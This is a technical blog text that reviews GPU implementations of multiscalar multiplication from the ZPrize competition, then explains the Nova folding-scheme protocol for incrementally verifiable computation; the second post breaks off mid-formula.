(1.a) To compute $m_{i,j}$ for all $i,j$, a kernel with $N$ x $12$ blocks of $32$ threads are launched. All the scalars are partitioned and each thread is in charge of computing the $m_{i, j}$ for all $j$ for the coefficients $k_i$ in its partition. Partitions are of size ~ $n/(32*N)$.</p>
(1.b) Sequentially for each window $j$, the set of scalars $m_{i,j}$ is sorted using cub::DeviceRadixSort::SortPairs</code>. Let us denote $m_{i, j}’$ the $i$-th scalar of window $j$ after sorting.</p>
(1.c) Sequentially for each window $j$, the number of occurrences of each scalar $1 \leq m < 2^s$ in the window is computed using cub::DeviceRunLengthEncode::Encode</code> on the previously sorted scalars $m_{i,j}’$.</p>
(1.d) For technical reasons needed in the next step, the cumulative sum of the number of occurrences is computed using cub::DeviceScan::InclusiveSum</code>.</p>
(1.e) A kernel is launched to compute the buckets. The kernel gets a grid of size $N$ x $12$ blocks of $32$ threads. Column $j$ of the total $12$ columns handles the buckets of a window $j$. The range of indexes $1$ to $n$ is divided evenly into subranges and each thread handles the buckets corresponding to the unique scalars $m_{i,j}’$ with $i$ in its range. Ranges are slightly expanded and contracted for threads to get non-overlapping sets of scalars.</p>
This concludes the computation of the buckets $B_{j, m}$ for all $0\leq j < 12$ and $1 \leq m < 2^s$</p>
For step (2) of Pippenger.</p>
(2.a) A kernel is launched on a grid of $N$ x $12$ blocks of $32$ threads. Each thread computes an even chunk of the sum $G_j = \sum mB_{j,m}$ just as described in the paper. As before, each column of the grid handles a different window.</p>
(2.b) For each window $j$, its chunks are added up using a binary reduction algorithm. This effectively computes all $G_j$ for $0 \leq j <12$.</p>
Then step (3) of Pippenger is performed in the CPU.</p>
6block submission</a></h2>
The main contribution of this solution is a different approach to steps (1) and (2). If we forget about GPU parallelization for a moment, both steps are performed in a single step as follows.</p>
(1’) For each window $j$, first sort all scalars $m_{i, j}$. Denote by $m_{i ,j}‘$ and $P_{i}’$ the sorted list of scalars and points respectively. For each $i$ from $n$ to $1$, where $n$ is the number of base points, compute</p>
$$\begin{aligned} t_{i-1} &:= t_{i} + P_{i}’ \\ s_{i-1} &:= (m_{i, j}’ - m_{i-1, j}’)t_i + s_i\end{aligned}$$</p>
with $t_n = P_n’$ and $s_n = \mathcal O$. Then $G_j$ is equal to $m_{0,j}’t_0 + s_0$. The rest of the approach is the same as in Pippenger.</p>
Parallelization strategy.</h3>
Let $n$ be the number of base points $2^{26}$. The window size used is $21$. The $253$ bits are grouped in $11$ windows of size $21$ and an additional window of size $22$.</p>
(1’.a) A kernel is launched on a one-dimensional grid of one-dimensional blocks of at most 128 threads. The exact size of the blocks is computed using the CUDA occupancy calculation function cudaOccupancyMaxPotentialBlockSize</code>. The total number of threads equals the number of points. Each thread is then in charge of computing all the $m_{i, j}$ for a single scalar $k_i$.</p>
The following steps are performed sequentially for each window $j$.</p>
(1’.b) Having fixed $j$, the list $(m_{i, j}){i=1}^n$ is sorted .</em> The cub</code> function cub::DeviceRadixSort::SortPairs</code> is used for this. This function sorts key-value pairs. In this case, the pairs sorted are $(m</em>{i,j}, i)$, to keep track of which base point corresponds to which scalar in the sorted list. Let us denote by $m_{i, j}^\prime$ and $P_i^\prime$ the sorted list of scalars and points respectively.</p>
(1’.c) Then a kernel is launched on a one-dimensional grid of one-dimensional blocks of at most 128 threads. Again the exact size of the blocks is computed using cudaOccupancyMaxPotentialBlockSize</code>. The range $1$ to $n$ is split evenly and each thread is in charge of computing the sum $\sum m_{i, j}‘P_i’$ for $i$ in its range. This is done by computing $s_0$ and $t_0$ as described above. This produces a certain number of partial results (one for each thread) that we denote here by $B_{k, j}$. The sum of all these elements for all $k$ equals $G_j$.</p>
(1’.d) The results $B_{k, j}$ for all $k$ are copied to the CPU and added sequentially to get $G_j$. Then, this is doubled $21$ times to get $2^{21}G_j$ (except for the last window where $2^{22}G_{12}$ is computed). While this happens in the CPU, steps (1’.b) and (1’.c) are handled in the GPU for the subsequent window.</p>
Once all windows have been handled, the final sum is performed in the CPU.</p>
A few interesting things to note about this solution.</p>
    * The code is very clear. It uses OOP and many c++11 features and standard libraries.</span></span>
    * A naive implementation of the kernel launched in step (1'c) could severely suffer from warp divergence. This is because there is a lot of branching in the construction of $t_i$ and $s_i$. For example, if one $m_{i, j}'$ is equal to $m_{i-1,j}'$ then nothing has to be done to compute $s_i$. To overcome this issue, each thread fills up a buffer of max size $10$ with the non-zero differences $m_{i, j} - $m_{i-1, j}$ it encounters. All the elliptic curve operations are postponed until one of the threads in the warp fills out its buffer. At this point, all the threads in the warp flush their pending elliptic curve operations. To do this the warp vote function `__any_sync` is used (see [here](https://docs.nvidia.com/cuda/cuda-c-programming-guide/index.html#warp-vote-functions)).</span></span></code></pre>Mike Voronov and Alex Kolganov</a></h2>
Mainly, this submission improves over the baseline using signed scalars to reduce the number of buckets in step (1) of Pippenger (more details below). Although it also claims to use a careful tiling of threads to compute the partial sums in step (2) in Pippenger’s algorithm in parallel, there is little documentation about it.</p>
The main contribution is in step (1). This solution uses a window size $s=23$.</p>
(1.a) To compute $m_{i, j}$ a one-dimensional grid of one-dimensional blocks of size $256$ is launched. The total number of threads equals the number of base points, which is $2^{26}$. Each thread is in charge of computing the subscalars $m_{i, j}$ for a single $k_i$. Since the window size is $2^{23}$, all the subscalars $m_{i, j}$ satisfy $0 \leq m_{i, j} < 2^{23}$. If a subscalar is $m_{i, j}$ turns out to be bigger than $2^{22}$, then $2^{23}$ is substracted from it reducing it to the range $-2^{22} \leq m_{i, j} < 0$ and $2^{23}$ is carried over to the next window. The sign of the negative subscalar is transferred to the base point, given that it is cheap to negate elliptic curve points. As a consequence, they end up with subscalars in the range $0 \leq m_{i, j} < 2^{22}$ and possibly an additional window in case the last window needs to carry scalars.</p>
Windows are then separated into two groups: The windows with odd and even indexes. Windows are handled in an asynchronous way and it is possible to handle more than two, the config.numAsync</code> variable manages stream count. But for A40, two streams are enough to utilize all compute resources. The only exception is the last window which is treated separately in the CPU since it is the overflow window of the previous step and it is therefore much smaller. Each group gets its stream of threads and traverses its windows sequentially to compute the buckets and the final window sum $G_j$ as follows.</p>
(1.b) For each window $j$, it sorts the subscalars $m_{i, j}$ and precomputes the starting and ending indexes of the occurrences of each subscalar in the sorted list, along with the number of occurrences of each one. This is done using the thrust::sort_by_key</code> and thrust::inclusive_scan</code> functions from the thrust</code> library. It then launches a kernel with a one-dimensional grid of one-dimensional blocks of size $32$ to compute the buckets using the above pre-computed information.</p>
(2.a) All windows are computed in parallel in different streams (two streams were used, but it is possible to use more, depending on GPU memory).

(2.b) The buckets are then sorted, such that the buckets with the most points are run first. This allows the GPU warps to run convergent workloads and minimizes the tail effect. This solution writes custom algorithms to achieve this.</p>
Then step (3) of Pippenger is performed in the CPU.</p>
Other things to note from this solution.</p>
    * The use of the `thrust` library.</span></span>
    * It always uses one-dimensional grids of one-dimensional blocks of sizes either $256$ or $32$.</span></span>
    * Two streams are used to even and odd windows in step (1.b) in parallel. This is because two streams are enough to utilize all computational resources.</span></span>
    * It looks like it was developed and run on a memory-constrained GPU card. In step (1.b) each group reuses the allocated arrays to store the buckets. It also reuses allocated arrays for different unrelated intermediate steps in the computation of the sorted lists of subscalars and the indexes associated with the first and last occurrences of each one.</span></span></code></pre>
Tested ideas that didn’t work. From the README of the submission:</p>
    * NAF - signed scalars are better because NAF reduces the number of buckets 2/3 times, but signed scalars in 2 times</span></span>
    * NAF + signed scalars - the main drawback of this variant is that a count of sums on the 2nd step twice more</span></span>
    * Karatsuba multiplication + Barrett reduction - turned out that the CIOS baseline Montgomery is better</span></span>
    * Affine summation + the Montgomery trick - turned out to be slower than the baseline summation</span></span></code></pre>MatterLabs</a></h2>
This solution precomputes $2^{69j}P_i$ for each input point (this is different from what is stated in the documentation), $P_i$, and $j=0, 1, 2, 3$. These are all points in the EC. We can rewrite the first sum in this way:</p>
$$ \sum_{i=1}^n \sum_{j=0}^3 k_{ij}2^{69j} P_i$$</p>
where each $k_{ij}<2^{69}$.</p>
Since each $2^{69j}P_i$ belongs to the EC and is already computed we can rewrite the sum as $\sum_{m=1}^{3n}k_m P_m$ (for other $k$s and other $P$s) where each $k_{m}<2^{69}$. This allows us to split each $k_m$ into three 23-bit windows for Pippenger’s algorithm.</p>
The Arkworks</code> library is used to represent finite fields, elliptic curves, and big integers in the tests. However, for the MSM algorithm itself, these structures are implemented by the authors. They used optimized versions of the operations to run them on the GPU when running device code.</p>
A new library is developed called Bellman-CUDA</code>. It’s used to make operations on finite fields, sort (using CUB</code> utilities), run length-encoding (using CUB</code> as well), etc. taking advantage of the GPU. The goal of this is probably to replace in the future the calls to CUB</code> with more efficient algorithms.</p>
The windows are processed in smaller parts. The first chunk of all the windows is processed first, then the second chunk of all windows, etc. This allows processing while other scalar parts are still in asynchronous transfer from the host to the device memory.</p>
For each window chunk, a tuple index for each bucket is generated in parallel: $(i, j)$ where $i$ is the coefficient for the bucket and $j$ is the EC point in that bucket. These are sorted (in parallel) according to the first component so that we have the EC points that are to be summed up in each bucket. They are then length-encoded and sorted (in parallel as well) according to the number of points that the bucket has. In this way, the buckets that have more points will be processed first to enable efficient usage of the GPU hardware. After that, a list of offsets is generated (using the parallel algorithm to compute exclusive sums implemented by CUB</code>) to know where each bucket starts and ends. For example:</p>
$$

\begin{align}

2P_1+5P_2+4P_3+1P_4+2P_5 \rightarrow (2,1), (5,2), (4,3), (1,4), (2,5) \\

\rightarrow [(1, 4), (2, 1), (2, 5), (4, 3), (5, 2)], [1, 2, 4, 5], [1, 2, 1, 1] \\

\rightarrow [4, 1, 5, 3, 2], [0, 1, 3, 4, 5], [1, 2, 4, 5], [1, 2, 1, 1]

\end{align}

$$</p>
The buckets are then aggregated in parallel.</p>
The FF and EC routines have been optimized:</p>
    * Based on Montgomery's multiplication</span></span>
    * Minimized correction steps in the FF operations</span></span>
    * Use of XYZZ representation for the EC point accumulators</span></span>
    * Use of fast squaring</span></span></code></pre>Streams and memory management</h3>
The following streams are created:</p>
    * `stream`</span></span>
    * `stream_copy_scalars`</span></span>
    * `stream_copy_bases`</span></span>
    * `stream_copy_finished`</span></span>
    * `stream_sort_a`</span></span>
    * `stream_sort_b`</span></span></code></pre>
The first one is the mainstream. Kernels such as initialize_buckets</code>, compute_bucket_indexes</code>, run_length_encode</code>, exclusive_sum</code>, and sort_pairs</code> are run in that stream.</p>
stream_copy_scalars</code> waits for event_scalars_free</code>.

stream_copy_scalars</code> handles the async copying of scalars and enqueues event_scalars_loaded</code>.</p>
stream_copy_bases</code> waits for event_scalars_loaded</code> and event_bases_free</code>. This stream also handles the async copying of bases and queues event_bases_loaded</code>.</p>
stream</code> waits for event_scalars_loaded</code>, handles the kernel compute_bucket_indexes</code>, and queues event_scalars_free</code>.</p>
stream</code> handles the sorting of the indexes and the asynchronous allocation of memory for the indexes and run lengths, as well as the exclusive_sum</code> kernel and the allocation of memory for the offsets.</p>
stream</code> enqueues event_sort_inputs_ready</code>. stream_sort_a</code> and stream_sort_b</code> wait on that event to handle the sorting of the pairs on the GPU.</p>
stream_sort_a</code> enqueues event_sort_a</code> and stream_sort_b</code> enqueues event_sort_b</code>. stream</code> waits on that event and also on event_bases_loaded</code> before handling the kernel that aggregates the buckets. stream</code> enqueues the (async) freeing of memory for the bases.</p>
On the last loop of window chunk processing, stream_copy_finished</code> waits for event_scalars_loaded</code> and event_bases_loaded</code>.</p>
Memory es freed and the streams (except stream</code> that handles the bucket reduction and window splitting kernels) are destroyed.</p>
Bucket aggregation algorithm</h3>
This algorithm is used after having every bucket computed, and is the basis for a parallelization strategy to aggregate buckets. It is an alternative to the classic sum of partial sums trick in Pippenger’s. In what follows we assume every bucket has already been computed and the remaining problem is to add up all the points in every window.</p>
Notation</h3>
Let us fix some notation. Let $W=(B_0, \dots, B_{2^{b}-1})$ be a tuple of $2^b$ elliptic curve points. Let us call such a tuple a $b$-bit window</strong>. To every window $W$ we associate an elliptic curve point $P_W$ defined as</p>
$$P_W := B_1 + 2B_2 + \cdots + (2^{b}-1)B_{2^{b}-1}$$</p>
We call a tuple of $m$ such windows $C = (W_0, \dots, W_{m-1})$ of the same length $2^{b}$ a window configuration</strong>. We say that the window configuration has shape $(m, b)$. Every window configuration has an associated elliptic curve point defined by</p>
$$P_C := P_{W_0} + 2^{b}P_{W_1} + 2^{2b}P_{W_2} + \cdots + 2^{(m-1)b}P_{W_{m-1}}$$</p>
In the context of MSM, each $B_i$ is a bucket and $P_C$ is the desired final result.</p>
Reduction process</h3>
Let us assume every bucket has already been computed and let $C$ be the corresponding window configuration. MatterLabs’ solution implements an algorithm to obtain $P_C$ by iteratively reducing a window configuration $C_i$ of shape $(m, b)$ to another window configuration $C_{i+1}$ of shape $(2m, \lceil b/2 \rceil)$. At every step, the point $P_{C_{i}}$ is not necessarily equal to $P_{C_{i+1}}$, but it can be obtained from $C_{i+1}$ by shifting some scalars. See below for the details. The process starts with a configuration $C$ of shape $(3, 23)$ and ends with a configuration $D$ of shape $(96, 1)$. At this point, $P_C$ is computed from $D$.</p>
Window splitting</h3>
The reduction consists of splitting every window of a configuration. Let us describe this splitting process for a single $b$-bit window $W$. We construct from it two new $\lceil b/2\rceil$-bit windows $\hat W_0$ and $\hat W_1$ such that</p>
$$P_W = P_{\hat W_0} + 2^{\lceil b/2 \rceil}P_{\hat W_1}.$$</p>
The idea behind this construction is the following. Every component of $W$ is of the form $B_r$, where $0\leq r < 2^b$. We can write $r = a + b2^{k}$ where $0\leq a,b < 2^k$. Then $B_r$ is put into two new buckets, namely the $a$-th component of window $\hat W_0$ and the $b$-th component of window $\hat W_1$.</p>
Case $b$ even:</h4>
Write $b=2k$. Let $W$ be a $b$-bit window. Define the new $k$-bit windows $\hat W_0$ and $\hat W_{1}$ as follows.</p>
Denote the components of $W$ by $(B_{0}, \dots, B_{2^b-1})$. Then</p>
$$

\begin{aligned}

\hat W_{0} &:= (\sum_{i=0}^{2^{k}-1}B_{i2^k}, \sum_{i=0}^{2^{k}-1}B_{i2^k+1},\dots,\sum_{i=0}^{2^{k}-1}B_{i2^k+2^{k}-1}), \\

\hat W_{1} &:= (\sum_{i=0}^{2^{k}-1}B_{i}, \sum_{i=0}^{2^{k}-1}B_{i + 2^k},\dots,\sum_{i=0}^{2^{k}-1}B_{i + (2^{k}-1)2^{k}})

\end{aligned}

$$</p>
Case $b$ odd:</h4>
Let us write $b = 2k-1$. This case is similar to the above. As before, let $W$ be a $b$-bit window. The definition of $\hat W_0$ and $\hat W_1$ follows the same logic as before.

But there is a catch. If $r$ is such that $0\leq r < 2^b$ and we write $r= a + b2^k$ with $0\leq a,b < 2^k$, then $b$ is necessarily at most $2^{k-1}$. And so the second half of the coordinates of $\hat W_{1}$ will be empty. This is because none of the buckets $B_r$ of $W_n$ will be assigned to those coordinates. And so we obtain</p>
$$

\begin{aligned}

\hat W_{0} &:= (\sum_{i=0}^{2^{k-1}-1}B_{i2^k}, \sum_{i=0}^{2^{k-1}-1}B_{i2^k+1},\dots,\sum_{i=0}^{2^{k-1}-1}B_{i2^k+2^{k}-1}), \\

\hat W_{1} &:= (\sum_{i=0}^{2^{k}-1}B_{i}, \sum_{i=0}^{2^{k}-1}B_{i + 2^k},\dots,\sum_{i=0}^{2^{k}-1}B_{i + (2^{k-1}-1)2^{k}}, \mathcal O,\dots, \mathcal O).

\end{aligned}

$$</p>
In the above definition, there are $2^{k-1}$ coordinates with entry $\mathcal O$, the point at infinity.</p>
Reduction of window configurations and coefficient shifts</h3>
Performing the above process on every window of a configuration $C$ we obtain a new configuration $D$ of the desired shape. We will not always have $P_C = P_D$.</p>
Let $C=(W_0, W_1, \dots, W_n)$ be a window configuration of shape $(m, b)$. For every window $W_n$, let $\hat W_{2n}$ and $\hat W_{2n+1}$ the two $\lceil b/2 \rceil$-bit windows obtained from splitting $W_n$. Let $D=(\hat W_0, \hat W_1, \dots, \hat W_{2m-1})$. This is a window configuration of shape $(2m, \lceil b/2 \rceil)$.</p>
If $b$ is even, then it is easy to see that $P_C = P_D$.</p>
If $b$ is odd, then $P_C$ is, in general, different from $P_D$. For example, the first 2 terms of $P_C$ are $W_0 + 2^bW_1$. On the other hand, the first four terms of $P_D$ are $\hat W_0 + 2^k\hat W_1 + 2^{2k}\hat W_2 + 2^{3k}\hat W_3$. This is equal to $W_0 + 2^{2k} W_1 = W_0 + 2^{b+1}W_1$. And so the coefficient of $W_1$ in $P_D$ has an extra factor of $2$.</p>
Nevertheless, $P_C$ is equal to</p>
$$P_{\hat W_0} + 2^{k-f_1}P_{\hat W_1} + 2^{2k-f_2}P_{\hat W_2} + \cdots + 2^{(2m-1)k-f_{2m-1}}P_{\hat W_{2m-1}},$$

where $f_i = \lfloor i/2\rfloor$. We call these the coefficient shifts.</p>
In general, we can define $f_i$ to be $0$ for all $i$ if $b$ is even and $f_i = \lfloor i/2 \rfloor$ for all $i$ if $b$ is odd.</p>
Algorithm</h3>
We start with a window configuration $C_0$ of shape $(m, b) = (3, 23)$. Inductively for every $i$ perform the reduction step on $C_i$ to obtain a new window configuration $C_{i+1}$ and also accumulate the coefficient shifts. After $4$ steps we obtain $C_5$ of shape $(96, 1)$ and the accumulated coefficient shifts $f_i$.</p>
From $C_5$ and and the $f_i$ we can compute $P_{C_0}$.</p>
Parallelization strategy</h3>
When splitting a window configuration of shape $(m, b)$ into one of shape $(2m, k)$, where $k=\lceil b/2\rceil$, each new bucket is a sum of $2^k$ elements (or $2^{k-1}$ in some cases when $b$ is odd). To compute these, the following kernels are launched.</p>
    1. First a kernel with $2m2^{k+l}$ threads for some $l \leq \lfloor b/2 \rfloor$ is launched. The $2^k$ terms of the sum of each new bucket are split into $2^{l}$ even groups. Each thread then computes the sum of the terms in a group. These partial sums are computed sequentially.</span></span>
    2. A second kernel with $2m2^{k}$ threads is launched. Each thread is in charge of a bucket. It uses a binary reduction algorithm to compute it by adding the $2^l$ partial sums obtained by the previous kernel.</span></span></code></pre>Yrrid</a></h2>
This solution precomputes $2^{2\cdot23j}P_i$ for each input point, $P_i$ and $j=1,…,6$. These are all points in the EC. We can rewrite the first sum in this way:</p>
$$ \sum_{i=1}^n \sum_{j=0}^5 k_{ij}2^{2\cdot23j} P_i$$</p>
where each $k_{ij}<2^{2\cdot23}$.</p>
Since each $2^{46j}P_i$ belongs to the EC and is already computed we can rewrite the sum as $\sum_{m=1}^{6n}k_m P_m$ (for other $k$s and other $P$s) where each $k_{m}<2^{46}$. This allows us to

split each $k_m$ into two 23-bit windows for Pippenger’s algorithm.</p>
Another optimization the algorithm uses is the following: the window value has a sign bit and a 22-bit scalar value. If the scalar is large, we can negate the point and change the scalar to $s’=m - s$ where $m$ is the order of the field. The new scalar, $s’$, will have a high bit clear. This works since $s’ (-P_i) = (m - s) (-P_i) = -s -P_i = s P_i$.</p>
The buckets are then sorted, such that the buckets with the most points are run first. This allows the GPU warps to run convergent workloads and minimizes the tail effect. This solution writes custom algorithms to achieve bucket sorting instead of using the CUB libraries.</p>
The bucket sums are computed in parallel (assigning a thread to each bucket) using the XYZZ EC representation. The operations for this curve representation can be found here</a>.</p>
The FF and EC routines have been optimized:</p>
    * Based on Montgomery's multiplication</span></span>
    * Minimize correction steps in the FF operations</span></span>
    * Use an XYZZ representation for the EC point accumulators</span></span>
    * Use fast squaring</span></span></code></pre>Summary</h2>
Multiscalar multiplication (MSM) is one of the key operations in many proving systems, such as Marlin or Plonk with Kate polynomial commitment schemes. Owing to the nature of the operation, we can leverage GPUs to reduce its calculation time. The ZPrize competition sought to improve the current baseline of 5.86 seconds for an MSM with \( 2^{26} \) points for the BLS12-377 curve. There were 6 different proposals, each with its unique features, based on Pippenger’s algorithm: optimizing window size, precomputation of some points (trading memory for speed), different coordinate systems for elliptic curve addition, endomorphisms, parallel reduction algorithms, point negation, non-adjacent form for integers, better finite field arithmetic. The best solutions achieved 2.52 seconds (2.3x speedup), but we think there is still more room for further optimization. Will we get below 1 second? Maybe you have the answer…</p>


Incrementally verifiable computation: NOVA
Unknown — Fri, 20 Jan 2023 00:00:00 +0000
Introduction</h2>
One of the current goals is to realize, in an efficient way, incrementally verifiable computation (IVC). This cryptographic primitive allows a given party to show the integrity of a given computer program’s execution by providing proof that the result of each step is correct and that all previous ones have been appropriately executed at every step. More precisely, given step \( N \), we apply a function \( F_N \) which updates the state, taking as inputs the current state \( x_N \) and a proof that asserts the correct execution of all steps \( 1,2,…N-1 \), \( \pi_{N-1} \), and outputting the new state \( x_{N+1} \) and a proof of its correct execution \( \pi_{N+1} \). IVC has many applications, such as allowing decentralized private computation (DPC), where you can delegate the execution of your programs to untrusted third parties, succinct blockchains, and verifiable delay functions.</p>
In a previous post, we discussed the problem of DPC and two protocols related to it, ZEXE and VERI-ZEXE</a>. ZEXE discussed the possibility of using proof-carrying data (PCD) to be able to verify arbitrary computations, but this can be pretty expensive computationally since, at each step, we need to verify the proof of the previous step, for which we need to:</p>
    1. Compute expensive bilinear pairing operations.</span></span>
    2. Include the arithmetic circuit of the verifier into our program, which is not a lightweight construction.</span></span></code></pre>
VERI-ZEXE leveraged accumulation schemes (AS) to provide IVC. The key idea is to delay the final proof to the ledger’s validators (where we will need to compute the expensive pairing operation). At each step of the computation, the proof \( \pi_{N-1} \) is “added” to an accumulator, which is then partially verified: the prover checks that the result of the accumulation is correct, but does not compute pairing operations. We mask the group elements in the accumulator using a randomizer to ensure zero knowledge.</p>
Nova</a> is a new protocol proposing an alternative to realizing IVC with lightweight construction. Instead of using zk-SNARKs</a>, they take advantage of folding schemes, accumulating NP instances instead of SNARKs. The authors claim it results in a weaker, simpler, and more efficient scheme than those relying on succinct arguments of knowledge:</p>
    * The verifier circuit is constant in size and dominated by two group scalar multiplications.</span></span>
    * The prover's work is dominated by two multiexponentiations.</span></span></code></pre>
The key point is that the folding acts as a deferral of proof verification until the last point: to check the correct application of \( N \) times a given function, we only need to check the folded proof for the \( N \) steps.</p>
Folding schemes</h2>
A folding scheme is a protocol between an untrusted prover and a verifier. Each of them has an \( N- \)sized NP instance of equal size, and the prover has, in addition, witnesses for both instances (recall, in the context of zk-SNARKs that we call witness the secret inputs/information). The protocol enables them to output a single \( N- \) sized NP instance, known as the folded instance. The folding scheme guarantees that the folded instance is satisfiable only if the original instances are valid. We call the scheme non-trivial if the verifier’s work and communication are less than those he would have if he did not participate in the folding scheme. The folding scheme reduces the satisfiability of two NP instances to just one NP instance. Some techniques exhibiting this two-to-one reduction (or some reduction) are sum check protocols, batch proving, and bulletproofs. To realize such a construction, we have to introduce relaxed (quadratic) rank-one constraint systems (relaxed R1CS).</p>
R1CS and relaxed R1CS</h2>
We saw that the correct execution of a given code could be expressed as a circuit satisfiability problem</a>. Circuits are equivalent to R1CS, which are systems of equations of the form:

\[ Az \times Bz = Cz \]

where \( A,B,C \) are sparse matrices and \( \times \) denotes component-wise product. It is quadratic because each variable in each equation has at most degree two (we can have \( z_1^2 \) but not \( z_1^4 \)). Even though R1CS are a convenient way to express circuits, they are not fully compatible with folding schemes; in other words, it is not easy to build a folding scheme on top of R1CS.</p>
Nova works by taking incremental computations, where each step is expressed as an R1CS; the constraint system is augmented with the verification circuit, which has to assert the correctness of the execution of the previous step. However, instead of verifying the proof \( \pi_{N-1} \), Nova treats it as an instance of R1CS and folds it into a running relaxed R1CS.</p>
A relaxed R1CS introduces an error, \( E \), and a scalar, \( u \), such that

\[ Az \times Bz = uCz+E \]

Note that any R1CS is also a relaxed R1CS, where \( E \) is the zero vector and \( u=1\). Relaxed R1CS retains the property that it is NP-complete, which means that we can reduce any NP problem to it.</p>
We want the folding scheme to merge two instances of R1CS with the same matrices \( A, B, C \) into a single one. Each R1CS has its corresponding instance-witness pairs (that is, public and private data), \( z_i=(w_i,x_i) \), and we want to create a new \( z=(w,x) \) satisfying the R1CS system of equations with \( A, B, C \), such that this also implies that each \( z_i=(w_i,x_i) \) does so. One way to do this is by having the verifier select a random \( r \) and perform the following transformation:

\[ z=z_1+rz_2 \]

This transformation would suffice for linear systems of equations, but since the R1CS is nonlinear, we cannot apply this simple strategy. If we replace this into the R1CS

\[ Az_1\times Bz_1+r(Az_1 \times Bz_2 +Az_2\times Bz_1)+r^2(A_2z_2\times B_2z_2) = Cz_1+rCz_2 \]</p>
In the relaxed R1CS, the error term \( E \) will absorb all the cross-terms generated by introducing the linear combination, and \( u \) will take the extra \( r \) term on the right-hand side. To do so,

\[ u=u_1+ru_2 \]

\[ E=E_1+r(Az_1\times Bz_2+Az_2\times Bz_1-u_1Cz_2-u_2Cz_1)+r^2E_2\]

and both \( u,E \) are added to the instance-witness pair. The main problem is that the prover has to send the witnesses \( w_1,w_2 \) to the verifier so that he can compute \( E \). To do this, we treat both \( E \) and \( w \) as witnesses and hide them using polynomial commitment schemes.</p>
Polynomial commitment scheme</h2>
Nova uses an inner product argument (IPA</a>), which relies on Pedersen commitments. These are based on the assumption that the discrete log is hard to solve and do not require a trusted setup. IPA differs from other popular commitment schemes, such as KZG, which relies on elliptic curve pairings and needs a trusted setup. Regarding proof sizes and verification times, KZG is better since IPA with Pedersen commitments requires linear work from the verifier, with proof size depending on the input (KZG’s proof and verification time are constant). However, we can work these weaknesses around in systems such as Halo.</p>
The lightweight construction of the verifier is tied to the polynomial commitment scheme. In this case, the highest cost is two group scalar multiplications </a>. Nova’s verifier circuit is around 20,000 constraints.</p>
The fundamental property that the polynomial commitment scheme must satisfy is that it is additively homomorphic: given two variables \( a, b \), we say that the commitment is additively-homomorphic if \( \mathrm{cm}(a+b)=\mathrm{cm}(a)+\mathrm{cm}(b) \), where \( \mathrm{cm}(x) \) is the commitment of \( x \). Both KZG and Pedersen’s commitments fulfill this property. Using this, both the verifier’s communication and work are constant.</p>
The other necessary property is succinctness: the commitment size must be logarithmic in the opening size. For example, if we have a degree \( n \) polynomial, its commitment should take at most \( \log(n) \) elements.</p>
Folding scheme for committed relaxed R1CS</h2>
An instance (that is, the public variables) for a committed relaxed R1CS is given by \( x \), the public input and output variables, \( u \) and the commitments to \( E \), \( \mathrm{cm}(E) \) and \( \mathrm{cm}(w) \). We can group these in the tuple \( (x,\mathrm{cm}(w),\mathrm{cm}(E),u)\). The instance is satisfied by a witness (secret variables) \( (E,r_E,w,r_w)\) if \( \mathrm{cm}(E)=\mathrm{Commit}(E,r_E)\), \( \mathrm{cm}(w)=\mathrm{Commit}(w,r_w)\) and \( Az\times Bz = uCz+E \), where \( z=(w,x,u) \). In simple words, the witness satisfies the instance if the public variables \( \mathrm{cm}(E) \) and \( \mathrm{cm}(w) \) are indeed the commitments to the private variables \( E,w \) using randomness \( r_E,r_w \), respectively and they fulfill the relaxed R1CS equations.</p>
The prover and verifier have access to two instances of relaxed R1CS, \( (x_1,\mathrm{cm}(w_1),\mathrm{cm}(E_1),u_1)\) and \( (x_2,\mathrm{cm}(w_2),\mathrm{cm}(E_2),u_2)\). In addition, the prover has \( (E_1,r_{E1},w_1,r_{w1})\) and \( (E_2,r_{E2},w_2,r_{w2})\). The protocol proceeds as follows:</p>
1.The prover computes \( T=Az_1\times Bz_2+Az_2\times Bz_1-u_1Cz_2-u_2Cz_1\) and sends the commitment to it, \( \mathrm{cm}(T)=\mathrm{Commit}(T,r_T) \).

2. The verifier samples the random challenge, \( r \).

3. The prover and verifier output the folded instance,

\( \mathrm{cm}(E)=\mathrm{cm}(E_1)+r^2\mathrm{cm}(E_2)+r\mathrm{cm}(T) \)

\( u=u_1+ru_2 \)

\( \mathrm{cm}(w)=\mathrm{cm}(w_1)+r\mathrm{cm}(w_2) \)

\( x=x_1+rx_2 \)

4. The prover updates the witness

\( E=E_1+rT+r^2E_2 \)

\( r_E=r_{E1}+rr_T+r^2r_{E2} \)

\( w=w_1+r w_2 \)

\( r_w=r_{w1}+rr_{w2} \)</p>
The protocol can be made non-interactive by using the Fiat-Shamir transformation.</p>
Using this strategy, we can realize IVC by successively updating the parameters after folding. The prover can then use a zk-SNARK showing that he knows the valid witness \( (E,r_E,w,r_w) \) for the committed relaxed R1CS in zero knowledge, that is, without revealing its value.</p>
The problem with using some common SNARKs is that the prover must show that he knows valid vectors whose commitments equal given values. This implies encoding a linear number of group scalar multiplications in the SNARK’s model. Therefore, we need a new construction to deal with this problem.</p>
Polynomial interactive oracle proof (PIOP)</h2>
The PIOP is a modified version of Spartan. It is based on the sum-check protocol and multilinear polynomials. For a given function mapping bitstrings to field elements, \( f:{0,1}^n \rightarrow \mathbb{F}\), we say that \( p:{0,1}^n \rightarrow \mathbb{F} \) is a polynomial extension of \( f \) if it is a low degree polynomial satisfying \( f(x)=p(x) \) for all \( x \) in \( {0,1}^n \). We call the extension multilinear if \( p \) is a multilinear polynomial such that \( f(x)=p(x) \). Multilinear polynomials are polynomials in several variables, such that the degree of each variable is at most 1 in every term. For example, \( p(x_1,x_2,x_3)=x_1+x_1x_2x_3+x_2x_3 \) is multilinear (in each term, we have at most \( x_i \)), but \( p(x_1,x_2)=x_1^2x_2 \) is not.</p>
The R1CS matrices, \( A,B,C \) can be thought as functions from \( {0,1}^m \times {0,1}^m\) to some finite field \( \mathbb{F_p} \) in a natural way. Therefore, we can also make multilinear extensions of them \( A_{ML}, B_{ML}, C_{ML} \), that is, \( 2\log(m) \) multilinear polynomials. Since the R1CS matrices are sparse, the corresponding multilinear polynomials are sparse (in simple words, they have few non-zero coefficients). The vectors \( E \) and \( w \) can also be interpreted as polynomials, \( E_{ML} \) and \( w_{ML} \). The vector \( z=(w,x,u) \) and \( y=(x,u) \) have also their multilinear extensions \(z_{ML},y_{ML} \). We have the following function,

\[ F(t)=(\sum_y A_{ML}(t,y)z_{ML}(y))\times (\sum_y B_{ML}(t,y)z_{ML}(y))-\ (u\sum_y C_{ML}(t,y)z(y)+E_{ML}(t)) \]

